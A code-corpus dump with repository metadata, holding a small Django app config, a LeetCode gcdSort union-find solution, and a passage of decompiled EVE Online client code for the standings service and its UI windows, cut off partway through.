branch_name: refs/heads/main
visit_date: 2023-08-23T16:34:42.470321
revision_date: 2021-11-05T07:06:40
committer_date: 2021-11-05T07:06:40
github_id: 402,777,939
star_events_count: 1
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 160
extension: py
content:
from django.apps import AppConfig


class AdministratorsConfig(AppConfig):
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'administrators'
blob_id: 96b7f757a6988a25b6d5ad78d76e2389fa42424d
directory_id: bfe6c95fa8a2aae3c3998bd59555583fed72900a
path: /gcdSort.py
content_id: 97870c2ccb58fb7d3bff9a961af1faed1095b64f
detected_licenses: []
license_type: no_license
repo_name: zzz136454872/leetcode
snapshot_id: f9534016388a1ba010599f4771c08a55748694b2
revision_id: b5ea6c21bff317884bdb3d7e873aa159b8c30215
branch_name: refs/heads/master
visit_date: 2023-09-01T17:26:57.624117
revision_date: 2023-08-29T03:18:56
committer_date: 2023-08-29T03:18:56
github_id: 240,464,565
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 1,658
extension: py
content:
from typing import List


class Solution:
    def gcdSort(self, nums: List[int]) -> bool:
        parent = [i for i in range(10**5 + 1)]
        # parent=[i for i in range(30)]

        def find(loc):
            while parent[loc] != loc:
                loc = parent[loc]
            return loc

        def merge(loc1, loc2):
            p1 = find(loc1)
            p2 = find(loc2)
            parent[max(p1, p2)] = min(p1, p2)

        prime = [
            2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61,
            67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137,
            139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,
            211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277,
            281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359,
            367, 373, 379, 383, 389, 397, 401, 409
        ]
        for num in nums:
            tmp = num
            for i in range(len(prime)):
                if prime[i] * prime[i] > num:
                    break
                if tmp % prime[i] != 0:
                    continue
                while tmp % prime[i] == 0:
                    tmp //= prime[i]
                # print('merge',prime[i],num)
                merge(prime[i], num)
            if tmp > 1:
                merge(tmp, num)
        # print(parent)
        nums1 = nums.copy()
        nums.sort()
        for i in range(len(nums)):
            if find(nums[i]) != find(nums1[i]):
                return False
        return True


nums = [7, 21, 3]
nums = [5, 2, 6, 2]
nums = [10, 5, 9, 3, 15]
print(Solution().gcdSort(nums))
5c220167824fe75cd06767eb4147fd313b5cd7c0
aad164e4efe1d55cc189c35956bfd435b14a0f52
/eve-8.21.494548/eve/client/script/ui/services/standingsvc.py
cd9b5d9e80c90852dc4d67ffe06ddadd8d5829e8
[]
no_license
Pluckyduck/eve
61cc41fe8fd4dca4fbdcc4761a37bcfeb27ed84f
9a277707ab1f162c6bd9618faf722c0be3ea93ad
refs/heads/master
2020-12-28T23:35:29.992875
2013-05-06T14:24:33
2013-05-06T14:24:33
null
0
0
null
null
null
null
UTF-8
Python
false
false
43,443
py
#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/client/script/ui/services/standingsvc.py import service import blue import uthread import uix import uiutil import xtriui import operator import util import base import form import listentry import state import types from itertools import starmap import standingUtil import log import uicls import uiconst import localization class Standing(service.Service): __exportedcalls__ = {'GetTransactionWnd': [], 'GetCompositionWnd': [], 'GetStandingEntries': [], 'GetStandingEntry': [], 'GetMySecurityRating': []} __notifyevents__ = ['OnStandingSet', 'OnStandingsModified', 'ProcessSessionChange'] __guid__ = 'svc.standing' __servicename__ = 'standing' __displayname__ = 'Standing Service' def __init__(self): service.Service.__init__(self) self.gotten = 0 self.npccorpstandings, self.npccharstandings, self.npcnpcstandingsto, self.npcnpcstandingsfrom = ({}, {}, {}, {}) self.toStandingHeader = blue.DBRowDescriptor((('toID', const.DBTYPE_I4), ('standing', const.DBTYPE_R5))) self.fromStandingHeader = blue.DBRowDescriptor((('fromID', const.DBTYPE_I4), ('standing', const.DBTYPE_R5))) def OnStandingSet(self, fromID, toID, standing): if util.IsNPC(fromID): if toID == eve.session.charid: if not standing: if fromID in self.npccharstandings: if session.warfactionid: sm.ScatterEvent('OnNPCStandingChange', fromID, 0.0, self.npccharstandings[fromID].standing) del self.npccharstandings[fromID] else: oldStanding = 0.0 if fromID in self.npccharstandings: oldStanding = self.npccharstandings[fromID].standing if session.warfactionid: sm.ScatterEvent('OnNPCStandingChange', fromID, standing, oldStanding) self.npccharstandings[fromID] = blue.DBRow(self.fromStandingHeader, [fromID, standing]) elif toID == eve.session.corpid: if not standing: if fromID in self.npccorpstandings: del self.npccorpstandings[fromID] else: self.npccorpstandings[fromID] = blue.DBRow(self.fromStandingHeader, [fromID, standing]) def OnStandingsModified(self, modifications): for modification in modifications: fromID, toID, m, minAbs, maxAbs = modification minAbs, maxAbs = minAbs * 10.0, maxAbs * 10.0 if toID == eve.session.charid: if fromID in self.npccharstandings: newval = self.npccharstandings[fromID].standing if m > 0.0: if self.npccharstandings[fromID].standing < maxAbs: newval = min(maxAbs, 10.0 * (1.0 - (1.0 - self.npccharstandings[fromID].standing / 10.0) * (1.0 - m))) elif self.npccharstandings[fromID].standing > minAbs: newval = max(minAbs, 10.0 * (self.npccharstandings[fromID].standing / 10.0 + (1.0 + self.npccharstandings[fromID].standing / 10.0) * m)) if session.warfactionid: sm.ScatterEvent('OnNPCStandingChange', fromID, newval, self.npccharstandings[fromID].standing) self.npccharstandings[fromID].standing = newval else: newval = max(min(10.0 * m, maxAbs), minAbs) self.npccharstandings[fromID] = blue.DBRow(self.fromStandingHeader, [fromID, newval]) elif toID == eve.session.corpid: if fromID in self.npccorpstandings: newval = self.npccorpstandings[fromID].standing if m > 0.0: if self.npccorpstandings[fromID].standing < maxAbs: newval = min(maxAbs, 10.0 * (1.0 - (1.0 - self.npccorpstandings[fromID].standing / 10.0) * (1.0 - m))) elif self.npccorpstandings[fromID].standing > minAbs: newval = max(minAbs, 10.0 * (self.npccorpstandings[fromID].standing / 10.0 + (1.0 + self.npccharstandings[fromID].standing / 10.0) * m)) self.npccorpstandings[fromID].standing = newval else: newval = max(min(10.0 * m, maxAbs), minAbs) self.npccorpstandings[fromID] = 
blue.DBRow(self.fromStandingHeader, [fromID, newval]) def Run(self, memStream = None): self.__RefreshStandings() def Stop(self, memStream = None): pass def CanUseAgent(self, factionID, corporationID, agentID, level, agentTypeID): self.__Init() if factionID in self.npccharstandings: fac = self.npccharstandings[factionID].standing else: fac = 0.0 if corporationID in self.npccharstandings: coc = self.npccharstandings[corporationID].standing else: coc = 0.0 if agentID in self.npccharstandings: cac = self.npccharstandings[agentID].standing else: cac = 0.0 return util.CanUseAgent(level, agentTypeID, fac, coc, cac, corporationID, factionID, {}) def GetMySecurityRating(self): self.__Init() if const.ownerCONCORD in self.npccharstandings: return self.npccharstandings[const.ownerCONCORD].standing return 0.0 def ProcessSessionChange(self, isRemote, session, change): if 'charid' in change and change['charid'][1] or 'corpid' in change and change['corpid'][1]: self.__RefreshStandings() def __Init(self): for i in range(120): if self.gotten: break self.LogInfo('Waiting while acquiring standings') blue.pyos.synchro.SleepWallclock(1000) def __RefreshStandings(self): if not eve.session.charid: return tmp = sm.RemoteSvc('standing2').GetNPCNPCStandings() self.npcnpcstandingsto = tmp.Filter('toID') self.npcnpcstandingsfrom = tmp.Filter('fromID') if util.IsNPC(eve.session.corpid): self.npccharstandings = sm.RemoteSvc('standing2').GetCharStandings() self.npccorpstandings = {} else: ret = uthread.parallel([(sm.RemoteSvc('standing2').GetCharStandings, ()), (sm.RemoteSvc('standing2').GetCorpStandings, ())]) self.npccharstandings = ret[0] self.npccorpstandings = ret[1] if type(self.npccorpstandings) != types.DictType: self.npccorpstandings = self.npccorpstandings.Index('fromID') self.npccharstandings = self.npccharstandings.Index('fromID') self.gotten = 1 def GetStanding(self, fromID, toID): self.__Init() relationship = None standing = None if fromID == eve.session.charid: relationship = sm.GetService('addressbook').GetContacts().contacts.get(toID, None) elif fromID == eve.session.corpid and not util.IsNPC(eve.session.corpid): relationship = sm.GetService('addressbook').GetContacts().corpContacts.get(toID, None) elif fromID == eve.session.allianceid: relationship = sm.GetService('addressbook').GetContacts().allianceContacts.get(toID, None) elif toID == eve.session.charid: if util.IsNPC(fromID) and fromID in self.npccharstandings: standing = self.npccharstandings[fromID] elif toID == eve.session.corpid and not util.IsNPC(eve.session.corpid): if util.IsNPC(fromID) and fromID in self.npccorpstandings: standing = self.npccorpstandings[fromID] elif util.IsNPC(fromID) and util.IsNPC(toID) and fromID in self.npcnpcstandingsfrom: for each in self.npcnpcstandingsfrom[fromID]: if each.toID == toID: standing = each break if standing is not None: ret = standing.standing elif relationship is not None: ret = relationship.relationshipID else: ret = const.contactNeutralStanding return ret def GetEffectiveStanding(self, fromID, toID): standing = self.GetStanding(fromID, toID) or 0.0 bonus = None if toID == eve.session.charid and util.IsNPC(fromID): bonus = ('', 0.0) char = sm.GetService('godma').GetItem(eve.session.charid) if util.IsCorporation(fromID): fromFactionID = sm.GetService('faction').GetFaction(fromID) elif util.IsFaction(fromID): fromFactionID = fromID else: agent = sm.GetService('agents').GetAgentByID(fromID) fromFactionID = agent.factionID relevantSkills = {} for skillTypeID in (const.typeDiplomacy, const.typeConnections, 
const.typeCriminalConnections): skill = char.skills.get(skillTypeID, None) if skill is not None: relevantSkills[skillTypeID] = skill.skillLevel bonus = standingUtil.GetStandingBonus(standing, fromFactionID, relevantSkills) if bonus is None or bonus[1] <= 0.0: bonus = '' else: effective = (1.0 - (1.0 - standing / 10.0) * (1.0 - bonus[1] / 10.0)) * 10.0 bonus = localization.GetByLabel('UI/Standings/Common/BonusAdded', bonus=bonus[0], value=standing) standing = effective return (standing, bonus) def GetStandingEntry(self, ownerID, fromID, toID, standing, showBonuses = 1, label = None): self.__Init() bonus = None bonusType = None relevantSkills = {} if showBonuses: if toID == eve.session.charid and util.IsNPC(fromID): bonus = ('', 0.0) char = sm.GetService('godma').GetItem(eve.session.charid) if util.IsCorporation(fromID): fromFactionID = sm.GetService('faction').GetFaction(fromID) elif util.IsFaction(fromID): fromFactionID = fromID else: agent = sm.GetService('agents').GetAgentByID(fromID) if agent is None: fromFactionID = None else: fromFactionID = agent.factionID for skillTypeID in (const.typeDiplomacy, const.typeConnections, const.typeCriminalConnections): skill = char.skills.get(skillTypeID, None) if skill is not None: relevantSkills[skillTypeID] = skill.skillLevel bonusType, bonus = standingUtil.GetStandingBonus(standing, fromFactionID, relevantSkills) if bonusType is None or bonus <= 0.0: bonus = '' else: effective = (1.0 - (1.0 - standing / 10.0) * (1.0 - bonus / 10.0)) * 10.0 bonusString = localization.GetByLabel('UI/Common/Unknown') if bonusType == const.typeDiplomacy: bonusString = localization.GetByLabel('UI/Standings/Common/DiplomacySkill', value=relevantSkills[bonusType]) elif bonusType == const.typeConnections: bonusString = localization.GetByLabel('UI/Standings/Common/ConnectionsSkill', value=relevantSkills[bonusType]) elif bonusType == const.typeCriminalConnections: bonusString = localization.GetByLabel('UI/Standings/Common/CriminalConnectionsSkill', value=relevantSkills[bonusType]) bonus = localization.GetByLabel('UI/Standings/Common/BonusAdded', bonus=bonusString, value=standing) standing = effective ownerinfo = cfg.eveowners.Get(ownerID) data = {} if label is None: label = ownerinfo.name if standing == 0.0: col = '<color=grey>' else: col = '' data['label'] = localization.GetByLabel('UI/Standings/StandingEntry', color=col, label=label, standing=standing, bonus=bonus, standingText=uix.GetStanding(round(standing, 0), 1)) data['ownerInfo'] = ownerinfo data['fromID'] = fromID data['toID'] = toID data['effective'] = standing return listentry.Get('StandingEntry', data) def GetStandingRelationshipEntries(self, whoID): fromFactionID = sm.GetService('faction').GetFaction(eve.session.corpid) fromCorpID = eve.session.corpid fromCharID = eve.session.charid toAllianceID = None if util.IsFaction(whoID): toFactionID = whoID toCorpID = None toCharID = None elif util.IsCorporation(whoID): toFactionID = sm.GetService('faction').GetFaction(whoID) toCorpID = whoID toCharID = None if not util.IsNPC(whoID): toAllianceID = sm.GetService('corp').GetCorporation(whoID).allianceID elif util.IsAlliance(whoID): toFactionID = None toCorpID = None toCharID = None toAllianceID = whoID elif util.IsNPC(whoID) and sm.GetService('agents').GetAgentByID(whoID): agent = sm.GetService('agents').GetAgentByID(whoID) toFactionID = agent.factionID toCorpID = agent.corporationID toCharID = whoID else: pubinfo = sm.RemoteSvc('charMgr').GetPublicInfo(whoID) toFactionID = 
sm.GetService('faction').GetFaction(pubinfo.corporationID) if not util.IsNPC(pubinfo.corporationID): toAllianceID = sm.GetService('corp').GetCorporation(pubinfo.corporationID).allianceID toCorpID = pubinfo.corporationID toCharID = whoID @util.Memoized def GetStanding(fromID, toID): return self.GetStanding(fromID, toID) def BogusStanding(fromID, toID): return None in (fromID, toID) or GetStanding(fromID, toID) is None standings = [ (fromID, toID, GetStanding(fromID, toID)) for fromID in [fromFactionID, fromCorpID, fromCharID] for toID in [toFactionID, toCorpID, toCharID, toAllianceID] if not BogusStanding(fromID, toID) ] if eve.session.allianceid is not None: remoteRels = sm.GetService('addressbook').GetContacts().allianceContacts for otherID in (toCorpID, toAllianceID): if otherID is not None and otherID in remoteRels: standing = remoteRels[otherID].relationshipID standings.append((eve.session.allianceid, otherID, standing)) def GetEntry(fromID, toID, standing): return self.GetStandingEntry(toID, fromID, toID, standing, label='%s &gt; %s' % (cfg.eveowners.Get(fromID).name, cfg.eveowners.Get(toID).name)) scrolllist = [] if not util.IsNPC(whoID): scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Standings/InfoWindow/YourStandings')})) scrolllist.extend(starmap(GetEntry, standings)) nonNeutralStandings = [ standing for blah, blah, standing in standings if standing != 0.0 ] if nonNeutralStandings: highest = max(nonNeutralStandings) data = util.KeyVal() data.line = 1 data.indent = 36 data.text = localization.GetByLabel('UI/Standings/Common/DerivedStanding', highest=highest, standing=uix.GetStanding(round(highest, 0), 1)) scrolllist.append(listentry.Get('Divider')) scrolllist.append(listentry.Get('Text', data=data)) scrolllist.append(listentry.Get('Divider')) else: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Standings/InfoWindow/StandingsWithYou')})) scrolllist.extend([ GetEntry(fromID, toID, self.GetStanding(fromID, toID)) for fromID in (toFactionID, toCorpID, toCharID) for toID in (fromFactionID, fromCorpID, fromCharID) if None not in (fromID, toID) and self.GetStanding(fromID, toID) is not None ]) if util.IsFaction(whoID): scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Standings/InfoWindow/StandingsOtherEmpires')})) factions = cfg.factions for faction in factions: if faction.factionID not in (whoID, const.factionUnknown): toInfo = cfg.eveowners.Get(faction.factionID) fromName = cfg.eveowners.Get(whoID).name toName = cfg.eveowners.Get(faction.factionID).name fromStanding = self.GetStanding(whoID, faction.factionID) fromStandingText = uix.GetStanding(round(fromStanding, 0), 1) toStanding = self.GetStanding(faction.factionID, whoID) toStandingText = uix.GetStanding(round(toStanding, 0), 1) fromText = localization.GetByLabel('UI/Standings/StandingRelationshipText', leftSide=fromName, rightSide=toName, standing=fromStanding, standingText=fromStandingText) toText = localization.GetByLabel('UI/Standings/StandingRelationshipText', leftSide=toName, rightSide=fromName, standing=toStanding, standingText=toStandingText) data = util.KeyVal() data.toInfo = toInfo data.label = fromText data.otherlabel = toText scrolllist.append(listentry.Get('FactionStandingEntry', data=data)) return scrolllist def GetStandingEntries(self, positive, whoID, exclude = {}, emptyMessage = 1): self.__Init() if whoID is None: whoID = eve.session.charid corpIDs = [] standings = [] if whoID == session.corpid: for npcID in 
self.npccorpstandings: if util.IsCorporation(npcID): corpIDs.append(npcID) standings.append((npcID, self.npccorpstandings[npcID].standing)) if whoID == eve.session.charid: for npcID in self.npccharstandings: standings.append((npcID, self.npccharstandings[npcID].standing)) prime = [] for each in standings: if each[0] not in cfg.eveowners: prime.append(each[0]) if prime: self.LogError("Remote standings query didn't return required owner info: ", prime) cfg.eveowners.Prime(prime) cfg.corptickernames.Prime(corpIDs) scrolllist = [] factions = [] alliances = [] corps = [] chars = [] agents = [] for each in standings: standing = each[1] ownerID = each[0] if ownerID not in exclude: fromID = ownerID toID = whoID ownerinfo = cfg.eveowners.Get(ownerID) entry = (round(standing, 2), ownerinfo.name, self.GetStandingEntry(ownerID, fromID, toID, standing)) standing = entry[2].effective if positive and standing < 0.01 or not positive and standing > -0.01: continue if ownerinfo.groupID == const.groupFaction: factions.append(entry) elif ownerinfo.groupID == const.groupCorporation: corps.append(entry) elif util.IsNPC(ownerID): agents.append(entry) def NegSortFunc(x, y): if x[0] < y[0]: return -1 if x[0] > y[0]: return 1 if x[1].lower() < y[1].lower(): return -1 if x[1].lower() > y[1].lower(): return 1 return 0 def PosSortFunc(x, y): if x[0] > y[0]: return -1 if x[0] < y[0]: return 1 if x[1].lower() < y[1].lower(): return -1 if x[1].lower() > y[1].lower(): return 1 return 0 if positive: SortFunc = PosSortFunc else: SortFunc = NegSortFunc factions.sort(SortFunc) alliances.sort(SortFunc) corps.sort(SortFunc) chars.sort(SortFunc) agents.sort(SortFunc) if factions: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Factions')})) for each in factions: scrolllist.append(each[2]) if alliances: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Alliances')})) for each in alliances: scrolllist.append(each[2]) if corps: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Corporations')})) for each in corps: scrolllist.append(each[2]) if chars: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Characters')})) for each in chars: scrolllist.append(each[2]) if agents: scrolllist.append(listentry.Get('Header', {'label': localization.GetByLabel('UI/Common/Agents')})) for each in agents: scrolllist.append(each[2]) if emptyMessage and not (factions or corps or chars or agents or alliances): text = '' name = cfg.eveowners.Get(whoID).name if whoID == session.charid: if positive: text = localization.GetByLabel('UI/Standings/Common/EverybodyNegativeYou') else: text = localization.GetByLabel('UI/Standings/Common/EverybodyPositiveYou') elif positive: if util.IsCharacter(whoID): text = localization.GetByLabel('UI/Standings/Common/EverybodyNegativeCharacter', id=whoID) else: text = localization.GetByLabel('UI/Standings/Common/EverybodyNegativeName', name=cfg.eveowners.Get(whoID).name) elif util.IsCharacter(whoID): text = localization.GetByLabel('UI/Standings/Common/EverybodyPositiveCharacter', id=whoID) else: text = localization.GetByLabel('UI/Standings/Common/EverybodyPositiveName', name=cfg.eveowners.Get(whoID).name) scrolllist.append(listentry.Get('Text', {'line': 1, 'text': text})) return scrolllist def GetTransactionWnd(self, fromID, toID = None): self.__Init() if fromID != toID: wnd = form.StandingTransactionsWnd.Open() wnd.Load(fromID, toID, 1, onPage=0) def GetCompositionWnd(self, 
fromID, toID): self.__Init() wnd = form.StandingCompositionsWnd.Open() wnd.Load(fromID, toID, purge=1) class StandingTransactionsWnd(uicls.Window): __guid__ = 'form.StandingTransactionsWnd' default_windowID = 'standingtransactions' def ApplyAttributes(self, attributes): uicls.Window.ApplyAttributes(self, attributes) self.scope = 'station_inflight' self.SetWndIcon() self.SetTopparentHeight(0) self.SetCaption(localization.GetByLabel('UI/Standings/TransactionWindow/WindowTitle')) self.SetMinSize([342, 256]) self.sr.scroll = uicls.Scroll(name='standingsTransactions', parent=self.sr.main, padding=(const.defaultPadding, const.defaultPadding, const.defaultPadding, const.defaultPadding)) self.sr.scroll.sr.id = 'standingsTransactions' eventTypes = [[localization.GetByLabel('UI/Common/All'), None]] + util.GetStandingEventTypes() browserParent = uicls.Container(name='browser', parent=self.sr.main, idx=0, align=uiconst.TOTOP, height=36) sidepar = uicls.Container(name='sidepar', parent=browserParent, align=uiconst.TORIGHT, width=54) btn = uix.GetBigButton(24, sidepar, 0, 12) btn.OnClick = (self.Browse, -1) btn.hint = localization.GetByLabel('UI/Common/Previous') btn.sr.icon.LoadIcon('ui_23_64_1') btn.state = uiconst.UI_HIDDEN self.sr.backBtn = btn btn = uix.GetBigButton(24, sidepar, 24, 12) btn.OnClick = (self.Browse, 1) btn.hint = localization.GetByLabel('UI/Common/ViewMore') btn.sr.icon.LoadIcon('ui_23_64_2') self.sr.fwdBtn = btn self.page = 0 inpt = uicls.SinglelineEdit(name='fromdate', parent=browserParent, setvalue=self.GetNow(), align=uiconst.TOPLEFT, pos=(8, 16, 92, 0), maxLength=16) uicls.EveLabelSmall(text=localization.GetByLabel('UI/Common/Date'), parent=inpt, width=200, top=-12) inpt.OnReturn = self.OnReturn self.sr.fromdate = inpt i = 0 for optlist, label, config, defval in [(eventTypes, localization.GetByLabel('UI/Standings/TransactionWindow/EventType'), 'eventType', localization.GetByLabel('UI/Common/All'))]: combo = uicls.Combo(label=label, parent=browserParent, options=optlist, name=config, select=settings.user.ui.Get(config, defval), callback=self.OnComboChange, pos=(inpt.left + inpt.width + 6 + i * 92, inpt.top, 0, 0), width=86, align=uiconst.TOPLEFT) self.sr.Set(label.replace(' ', '') + 'Combo', combo) i += 1 def OnComboChange(self, entry, header, value, *args): if self.sr.Get('data'): if entry.name == 'eventType': self.sr.data[4] = value self.sr.data[0] = None self.page = 0 uthread.pool('standing::OnComboChange', self.Load, self.sr.data[1], self.sr.data[2]) def OnReturn(self, *args): if self.sr.Get('data'): self.sr.data[5] = util.ParseDate(self.sr.fromdate.GetValue()) self.sr.data[0] = None uthread.pool('standing::OnReturn', self.Load, self.sr.data[1], self.sr.data[2]) def Browse(self, direction, *args): if self.sr.Get('data') and self.sr.data[3]: if direction > 0: eventID = None for each in self.sr.data[3]: eventID = each.eventID self.sr.data[5] = None self.sr.data[6] = 0 else: eventID = self.sr.data[0] self.sr.data[5] = None self.sr.data[6] = 1 self.sr.data[0] = eventID self.page += direction uthread.pool('standing::Browse', self.Load, self.sr.data[1], self.sr.data[2]) def GetNow(self): return util.FmtDate(blue.os.GetWallclockTime(), 'sn') def Load(self, fromID, toID, purge = 0, onPage = None): if getattr(self, 'loading', 0): return self.loading = 1 if onPage is not None: self.page = onPage try: self.sr.scroll.Clear() if fromID and toID: if util.IsCharacter(fromID) and util.IsCharacter(toID): standing = 
localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToCharacter', fromID=fromID, toID=toID) elif util.IsCharacter(fromID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToCorp', fromID=fromID, toName=cfg.eveowners.Get(toID).name) elif util.IsCharacter(toID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToCharacter', fromName=cfg.eveowners.Get(fromID).name, toID=toID) else: standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToCorp', fromName=cfg.eveowners.Get(fromID).name, toName=cfg.eveowners.Get(toID).name) elif fromID: if util.IsCharacter(fromID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCharacterToAny', fromID=fromID) else: standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromCorpToAny', fromName=cfg.eveowners.Get(fromID).name) elif util.IsCharacter(toID): standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromAnyToCharacter', toID=toID) else: standing = localization.GetByLabel('UI/Standings/TransactionWindow/TitleFromAnyToCorp', toName=cfg.eveowners.Get(toID).name) self.SetCaption(standing) scrolllist = [] if not self.sr.Get('data') or purge: self.sr.data = [None, None, None, [], None, None, 1] eventType = self.sr.data[4] eventID = self.sr.data[0] eventDateTime = self.sr.data[5] direction = self.sr.data[6] if eventDateTime is not None: if direction == 1: eventDateTime += HOUR * 23 + MIN * 59 + SEC * 59 data = sm.RemoteSvc('standing2').GetStandingTransactions(fromID, toID, direction, eventID, eventType, eventDateTime) self.sr.data = [eventID, fromID, toID, data, eventType, eventDateTime, direction] if self.page > 0: self.sr.backBtn.state = uiconst.UI_NORMAL else: self.sr.backBtn.state = uiconst.UI_HIDDEN if self.sr.data[3]: self.sr.data[0] = self.sr.data[3][0].eventID if len(self.sr.data[3]) < 25: self.sr.fwdBtn.state = uiconst.UI_HIDDEN else: self.sr.fwdBtn.state = uiconst.UI_NORMAL else: self.sr.fwdBtn.state = uiconst.UI_HIDDEN if self.sr.data[3]: for each in self.sr.data[3]: isNPC = False subject, body = util.FmtStandingTransaction(each) when = util.FmtDate(each.eventDateTime, 'ls') mod = '%-2.4f' % (each.modification * 100.0) while mod and mod[-1] == '0': if mod[-2:] == '.0': break mod = mod[:-1] if fromID is None: extraFrom = cfg.eveowners.Get(each.fromID).name + '<t>' else: if util.IsNPC(fromID): isNPC = True extraFrom = '' if toID is None: extraTo = cfg.eveowners.Get(each.toID).name + '<t>' else: extraTo = '' text = '%s<t>%s<t>%s%s%s %%<t>%s' % (each.eventID, when, extraFrom, extraTo, mod, subject) scrolllist.append(listentry.Get('StandingTransaction', {'line': 1, 'text': text, 'details': body, 'sort_%s' % localization.GetByLabel('UI/Common/Value'): float(mod), 'isNPC': isNPC})) else: scrolllist.append(listentry.Get('Text', {'line': 1, 'text': localization.GetByLabel('UI/Standings/TransactionWindow/NoTransactions')})) h = [localization.GetByLabel('UI/Common/ID'), localization.GetByLabel('UI/Common/Date')] if fromID is None: h += [localization.GetByLabel('UI/Common/From')] if toID is None: h += [localization.GetByLabel('UI/Common/To')] h += [localization.GetByLabel('UI/Common/Value'), localization.GetByLabel('UI/Common/Reason')] self.sr.scroll.Load(fixedEntryHeight=32, contentList=scrolllist, headers=h, reversesort=1, sortby=localization.GetByLabel('UI/Common/ID')) finally: self.loading = 0 class StandingTransaction(listentry.Text): __guid__ = 'listentry.StandingTransaction' 
__params__ = ['text', 'details'] def Load(self, node): listentry.Text.Load(self, node) self.isNPC = node.isNPC self.sr.details = node.details def GetMenu(self): if self.isNPC: details = self.sr.details return [(uiutil.MenuLabel('UI/Common/Details'), self.ShowTransactionDetails, (details,))] return [] def OnDblClick(self, *args): if self.isNPC: self.ShowTransactionDetails() def ShowTransactionDetails(self, details = None, *args): details = details if details != None else self.sr.details uix.TextBox(localization.GetByLabel('UI/Standings/TransactionWindow/Details'), details) class StandingEntry(uicls.SE_BaseClassCore): __guid__ = 'listentry.StandingEntry' def Startup(self, *etc): self.sr.label = uicls.EveLabelMedium(text='', parent=self, left=36, top=0, state=uiconst.UI_DISABLED, color=None, maxLines=1, align=uiconst.CENTERLEFT) uicls.Line(parent=self, align=uiconst.TOBOTTOM) self.sr.iconParent = uicls.Container(parent=self, left=1, top=0, width=32, height=32, align=uiconst.TOPLEFT, state=uiconst.UI_PICKCHILDREN) self.sr.infoicon = uicls.InfoIcon(size=16, left=0, top=2, parent=self, idx=0, align=uiconst.TOPRIGHT) self.sr.infoicon.OnClick = self.ShowInfo def Load(self, node): self.sr.node = node data = node self.sr.label.text = data.label self.sr.iconParent.Flush() logo = None typeInfo = cfg.invtypes.Get(data.ownerInfo.typeID) iconParams = {'parent': self.sr.iconParent, 'align': uiconst.TOALL, 'state': uiconst.UI_DISABLED, 'idx': 0} if typeInfo.groupID in (const.groupCorporation, const.groupFaction, const.groupAlliance): logo = uiutil.GetLogoIcon(itemID=data.ownerInfo.ownerID, **iconParams) elif typeInfo.groupID == const.groupCharacter: logo = uicls.Icon(icon=None, **iconParams) sm.GetService('photo').GetPortrait(data.ownerInfo.ownerID, 64, logo) self.sr.label.left = 36 def OnDblClick(self, *args): self.ShowTransactions(self.sr.node) def ShowTransactions(self, node): node = node if node != None else self.sr.node sm.GetService('standing').GetTransactionWnd(node.fromID, node.toID) def ShowCompositions(self, node = None): node = node if node != None else self.sr.node sm.GetService('standing').GetCompositionWnd(node.fromID, node.toID) def EditStandings(self, node = None): node = node if node != None else self.sr.node sm.GetService('standing').GetEditWnd(eve.session.charid, node.toID) def ResetStandings(self, node = None): node = node if node != None else self.sr.node if eve.Message('StandingsConfirmReset', {'who': cfg.eveowners.Get(node.toID).name}, uix.YESNO, suppress=uix.ID_YES) == uix.ID_YES: sm.GetService('standing').ResetStandings(eve.session.charid, node.toID) def EditCorpStandings(self, node = None): node = node if node != None else self.sr.node sm.GetService('standing').GetEditWnd(eve.session.corpid, node.toID) def ResetCorpStandings(self, node = None): node = node if node != None else self.sr.node if eve.Message('StandingsConfirmResetCorp', {'who': cfg.eveowners.Get(node.toID).name}, uix.YESNO, suppress=uix.ID_YES) == uix.ID_YES: sm.GetService('standing').ResetStandings(eve.session.corpid, node.toID) def ShowInfo(self, node = None, *args): if self.sr.node.Get('ownerInfo', None): sm.GetService('info').ShowInfo(self.sr.node.ownerInfo.typeID, self.sr.node.ownerInfo.ownerID) def GetMenu(self): m = [] node = self.sr.node addressBookSvc = sm.GetService('addressbook') m.append((uiutil.MenuLabel('UI/Commands/ShowInfo'), self.ShowInfo, (node,))) if self.sr.node.toID != self.sr.node.fromID: if util.IsNPC(self.sr.node.fromID) and self.sr.node.toID == eve.session.corpid: 
